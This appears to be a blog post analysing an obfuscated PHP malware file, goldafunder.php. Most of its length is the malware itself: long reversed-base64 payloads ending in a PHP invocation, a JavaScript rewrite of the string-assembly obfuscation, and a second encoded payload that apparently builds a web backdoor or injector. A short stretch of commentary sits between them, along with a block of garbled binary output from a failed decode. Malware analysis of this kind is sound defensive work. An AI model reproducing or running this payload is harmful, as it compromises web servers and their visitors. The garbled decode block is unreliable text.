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")));$HTIRyzRYNNT();?>

Enter fullscreen mode Exit fullscreen mode

Now, to me, that last line looks like it contains some base64 string.

Upon decoding the last large base64 string ("K0...QC"), I got a binary (maybe).

+D+H7E�+L�Q����ԑ�����U�&��@��՘��^�ٜ��]�Տ�
ؓ�ԑ��
ܧ�&�+L��ۗU�+D&H6�ݦ�텝�����T&��T&��@��՘��^�ٜ��]�Տ�
ؓ�ԑ��
ܧ�&D+L��ۗU�&H6�ʅQɲH���ɡA��ٛ�����˘����ɘ����Q����������@��QɡA��ٛ�����˘��Iɋ����ۡ����������Y��������D��Y����ݘ�Q��]݄�ˋD��Y����� ���ޖщ�A��ٛ�����˘��ś����՘��������Ø��؛�U����Ȏ�ݠ���]�}]������Տ�ə�]��]�}]������щ�������ڲT&H6�ʧIH�ݛ��ڊ�[��������ܦ��U�&H6�ȥM�����U�&��T+H6�+D&D+L�Q����ԑ�����U�&D+H7E�&D+L�
ܔ�ɰ
ٔ�ɰ�ںQ���ԑ��ٝY�}]��וٛ�������&D&��IH��\������������ٛ��&D&H6���
ܔ���̜�Ԋ�\�OsQ���ˣ̉�
ٔ��&D&H6��D��Y����Y���������Yؒ���ՙ��Y�Q�}]��Q��X�ԑ�&D&H6�׈M��ٛ��oٙ�Q���ںQ��D&D+L�D��Y���ɧ؏p]�s�����
O���pQ�s܉�M����&D&H6�ʤ���ڽޕȱ
ؒ�����ܠ��T&H6��@��՘��^�ٜ��]�Տ�
ؓ�ԑ��
ܧ�&D+H6�����T&��T&H6�ݦ��A����Q����ՙ&D&H6��T&D+D&D&D+L�A����Q����Q����������R:Q}Q$�S%X��M���������A����Q��D&D&H6�ʯ�����@ȥ��Q��ٛ����ϕ�����U��ٙ&D&D+D+L�A����Q����   ���ޖщ�E��Ȱ��������M�������ܰ������U٭X��M���������A����Q��D&D&��D��Q��U�������U٬՝���   ���ޖݘ�X��M���������A����Q��D&D&��D��Q��U����՚���ݜ������՚���ݜ�����Q��Y�|���T��Q��U���&D&H6�ʕذەɱA��Q����A��Q�����՘����\��ϕذە�&D&D+L�A����Q�����Q����ޕɊ��Q��Y�|���T��Q��U���&D&H6�����T&D+D&D&D+L�A����Q�����Y����U����Q��Y�|���T��Q��U���&D&D+L����Ƀ�ςɜ�Q���؃IH˙�oٙ�Q��
��Y����&D&H6�ʦD���ۊ�[�������܇�\���D�t�����������]��Q����T&D+L��ۗU�&D+L�Q���ݹQ��ݘ�ݛ�����T&D+L�ޕɡA��ՙ��M�M����ӕ�ӝ���۽�&D&H6�ʧIH����Q��Q�̜�������]��Q����&D&�+L�D���۽����������]��Q����&D+H7E��@���ɠ�ِU��X��DȰY�����ʰY���������������Q��Q��ɢ
��Y�����A��ݹQ��ݘ���H�A����U��Q����D��A��ݹQ��ݘ��[������ݘ��ф��Y�T��Q�ӕ�ӝ����D��A��ݹQ��ݘ��[��������ܦ��U�&H6�ȥ
ۉ����&H6�׈�ںQ�}Q���ۤ���������ںQ�}Q���ۥ��    ���ޖщ����ݝ�Uϐ���U٬՝��׋���ܤ���Q���[�����՚���ݜ���IH����oٙ�Q�Tٱ���t���Q���[��������t���Y���[������؉�t���Q�Yoٙ�Q�\ڌQ�Q  �IH����U٬��������   ���ޖщ&H6�ʥ�������Q�}͔�؊��Q��Y�����\ۛ����ʙ���۰ٙ�ʥ����ݕٙ�����������������U�͑��H�Ȑ��������ٙXْ�ʧ��Q���ӕ�ӝ���]�ݗ���
���Q�}͔�؈�ذە�&H6�̯A^�U͓Q�m���Hٛщ&H6���
ۉ��E�����M��Q���������Q��Y���ː��U��ݖY���܀�����ݛ�џ�њ�Q��٘�ْQ��ٲY��U�٘���ݑ��ܗ���Q��Q��Q���ݑ�
���ܗ���شM��ٱݛ�݈����ط�Y��ܠ��T+L�D������������M�����ћ䕘�ۼًqY��՞����ۼًr��U�̕��U��]�����ݝ�ٻ���Q��Q��ۼًq����џ�њ�Qߠٜ�]��Q��Y��ۇۼًs��ۼًrݜ�ۼًs���ۼًqٛ������ݙ����ѝ�]��Y����U�&��IHI�QS��Hl�QX�QO�IPܦUے�׈�QIY�WAU ��IYI]}������t��9]�T�U|URl�QX�QO�IT����D����@ݼ��&H6�ʧA^�U͓Q�m�������ܤ
���&�&��X6�ʦL��Y��ݘ��ӕ�ӝ���]�ݗ���
���Q�}͔�؈
��ڰU��]��Q�����D+L�L��Y��ݘ������]����
���&��@��Y��U��щ&�+L��ۗY�6�+D&�+L�Q��T+H6�ʥݽ���ڰU��]��A��ٛ��M�M�������T+L�D&D+@���@��U�������Q�������ەɡA�����Q��@ȝI���ח���Y�Q��U��Ԃ&D&H7����ȥ  ����]������@�������\���������Y�Y�|���D&D&���٥���щ��ρę�Y��Y��ݘ�D&D&���W�W��ρę�Y��D&D&���QX�QO�I��ρȜ��ܔ��&D&D+@�щ��ρș�Ԃ&D&H6���܇P��щ&H6��T+L�D��՚������ەۼݗ�]�}Q�����A��ՙ��M�M�����I������ϕ�Xٍ�&H6�ʤ�٥���щ����Q���Y�Y���U�&��@��Y��U��щ&H6�ʉH��@ޒ���U�+D&����]�����̈]K��̈���ՙ&H6�ʉ��@ޒ���U�+H6��X6�ݦ�&H6�ȻH���PU�̈���ՙ&H6��Ņ����ەɠ�ݹQ��ݘ}���Y�Y��ʉ������]��U�����ȸ�ݒ���ݗ�՘��^��݌�ɰH�ԑ��
ܧ�&��D��Yؓ�����ەۼݗ�Q�}Q�����H��ڸ�ۼ՚�ٴ���Qɡٟ�Y�Q�~Q��]�T���Ņ�����ڲT+L�H�ԑ���٥���щ��ݹQ��ݘ}���Y�Y��ʉɛÔ�����Y���ݒ���ݗ�՘��^��݌�ɰH�ԑ��
ܧ�&�쌋����њ�������ٜU��؈����]����̋�����ݒD+L����̈MQ%��PQA]H�Ȉ����U�&��X�Ȅ��ɠ��X6��T�����Pٵ��ɡ������@�������+H6�ʦH�����Y�}ٞ��ݘ��ф��Y���U�������ɠ���숈��+H6�ʋD�E�����Q��\]���X���ݘ��ф��Y�����]���6�+L�ē������ڶQ�~YܿU��Њ�]�~Y��6�숙�ً���U����
݋���Q��Q��@��U���6�Ȝڸ�ۼ՚�ٴ�����������+L���щ���ܵ���٥���щ+H6��@��Q��Q����������������������6���숋�@��Q��Q��H6�������@�����X��]�Տ������+L�D��Y��������������Q���Y�Y��P����+H6�ȟ���Dګ՛������щ+H6�ȼ����ۡPٵ�����D͓Q���+H6���ݒ��U���������Qɹ
ܾ��   ����
ܾ��@ٷP��њ�����@��њ�������ܐ��՘����\�����ۡ�6�׊IW�UMUEY��T�T�W���ݒ��D��
T>AU ��IYI]}�����ћ�������ۡ�6�수�٘Q��D̔݌�D�������������E��������Pٵ�6��H��ՙ�ݗ������Y�}ٟPޒ�숈� ەۼщ+H6�+H7I�6�숋���Qݔ��+H6�ܥ��Q����Qݔ�ȦH����Q�������Y���\�����Q�|����Q�|�ڠ��X6�ʠ�ړ�\�Q�}ٟ�\��������Q��H6��L������������ȋ������Y���\���U�+H6���Q�}۔���щ��ڑ]���&��H������Qݔ�ȦH����A��Q����|�ځ���H�����ړ�\�����Q����������{܉�
��U�}ՙ�Ƞ�����ړ�]�Y��]ؒ����Y��@��Q���������+L�ȋ�����ۃ@��Q�}۔���щ&�+L�����Qݔ�Ȧ@�������Y���\�������Q�|�ڠ������Q�̕ړ�]�UؙQ�����՘��ۚX6��D�+L    �����Н�Q��ݘ�
ݞD+@���Ԃ&��̜�]�����ڽM��Yۥ�̝��Q��Ԙ���Ԃ&��ę�U�����Л�ڼ�ۏܜ�Y���ا�&H7��]��U���ݖY��E��U�]��ܜӕ��ќ�ݘ����Y���ںU��]�&H7��U��ɛ��K�U��]��ܜ�]����    ەۼՋ���&H7�ϕ��Q��ԙ�U��Q���ڼ�ّQۏ���
ݞD+@�  ەۼ��Q����]���ّQۏ���
ݞD+@
�Y��Q����Q�}��Y���&�+D&��@��Q�|ە��]�|�����Qݔ��&��T����ܐ�O�B����Y���ʁ��&�+L����Q�|��}ٜ��Q������+D+H6���щ������Y��Q�����Y�&��X6�ʋ   ��ޗ����۾Q��ݛ0���Q��Q�&H6�ʈ��� ��ޗ�����X7E�+L������A���ӕ�ӝ����Q��Q�&H6�ʈ���
ؒ���U�+H6��D��@������Q��@ٶ������ˈ�bUPKX�P��������U��ɠ��X6�ʈ���Q�������Q�L���Q��Q�����L�����ʁ��&��MI����\�ڞ�[���}ٟ�Y�Q�~Q��]ؐ�Q݅ܒH6�ן   ���]�Y����ܖ�����]�ݗ�՘��^��ݍ��   ��ޗ��&��MI����]�Q��ݘ��[���}ٟ�Y�Q�~Q��]ؐ�щ&�+L� �ԝؒ���ݗ�՘��^��ݏTʽ����]�ݗ�՘��^��ݍ��Yؒ���Q�&��MI$�U}TUT�Il�QX�QO�I���
T>AU!ܖIYI]}������ܓ@��Y܍�+L�̋������ȟ̋����ڜ��E����DςL������MI3�=SHWIYI]��T�T�W�
�ќ����\��ٜ��+D&��T��������Q�~Q޼��}ٜ��Q������+D+L�ə�]��]�}]������щ��������Y��Q�����Y�&��@�����۰ݗ��ݎX6��@�������ٟ�[�]��ə�]��]�}]������щ&��@����ř�]���݌��������+L�  ە՘�]����   S�I]W�UC�I]P������ܽ���[�]�&��@����O�e�IYO�UC�I]P������ܽ���[�]�&��@���Qe�IYO�UC�I]P������ܽ���[�]�&��@��̃��W�6Q}T?T��
�������]���Ղ+L�@Ȱ�Q�S�U8�UQY}T?T��
�������]���Ղ+L�  ���0�U}T?T��
�������]���Ղ+L����Y���[�]؃@Ƞщ&��X������;I����L�Ĉ��L�ǀ��ͽE������ݘ���՚��3Q"�
��̹���������Y���рނ��ۅ�\�À����8��љ�]�����Lˇ����4��ӕ��Y���ݓ���Qɡٟ�Y�Q�~Q��]؃���عY�+H6�+H7I�6�ٜQ����Qݔ��+@���+@���+D&��D����Q������ɻH���ӕ��Q������H���؏rQټ��s׽���՘����Y��܃@ȕ՘��&�숏�Џ������U������������&��L���������s�܋ȡA����Q����ӕ��Q����������H6���ψ��   ۗU��Q���������+L�Ϥ�ںQ�����]ێ��U�+D��������6������՘���ɛ������������̋���L�����    ۗU��Q��A��U�}ՙ�ȸ�����՘����Y��܃@ȕ՘��&��L�ӕ��Q���ѕ�����Y��Q�����U����D+L��ںQ�����Q���^��܄��ɛ��&H6�Ȧ̊���A���ȥ����������ٙ��������6��D��ۗU��Q��   ��ݘ�L������ӕ��ъ�U��A�&�+H7E�+L��ݹU������Uڹ]��Y��Q���ӕ��Q���&��M\���m��������ӕ��Q���&�����������M��Ƀ���ɣ���Z�ط�Y��ܠ��X6�ʢE�ȕ؃@��ۗU��Q�&�+L������Y���������M��ɢٝY�}]��וٛ������عY�+H7I�6�ؐ��Qݔ��+L����EJ�A�����ݽ���ˋ�TQR��Z���vP����Q��]�Б�Ϙ�|URnQ�����ڢ�׈ؐ�����IH�A���Z�����ܧTؒH6��IYI]}�]?�}�P�QTUQK�I�M��U�~U�ȕ�TڒH6���A�����]�ш�՚�ٛՙ�6��@��ڶQ�}U����]�+H4��&�+D+D*���
Enter fullscreen mode Exit fullscreen mode

I must now attempt to deobfuscate goldafunder.php to bring meaning to the base64 encoded text.

After transforming the original php file into a somewhat javascript:

var randomText="3K4hbIR80HU_5VL1MzAqr6GgewJPjOsC9f7uFYnixvSydaNTkDX2ctlZpomQWEB"; var firstText=randomText[4] +randomText[45]+  randomText[30]+  randomText[24]+ randomText[21]  +randomText[2] +randomText[11] +randomText[44] +randomText[24]+  
randomText[52]+  randomText[57] +randomText[44]+randomText[24]; var secondText=randomText[30]+ randomText[53]+ randomText[20] +randomText[20]+ randomText[24]  +randomText[41]; var thirdText=randomText[24]+  
randomText[20] +randomText[20] + randomText[57]+  
randomText[20]+ randomText[11]+randomText[20]+randomText[24]+  randomText[56]  +randomText[57] +randomText[20]+ randomText[53]  +randomText[39]  +randomText[38]+ randomText[23]; var fourthText=randomText[52] +randomText[20]+  
randomText[24] +randomText[45] + randomText[53] +randomText[24]  +randomText[11]+  randomText[33] +randomText[35] + randomText[38]+  randomText[52]+ randomText[53]+randomText[39] +randomText[57]+randomText[38];thirdText(0); var fifthText=fourthText("",firstText(secondText("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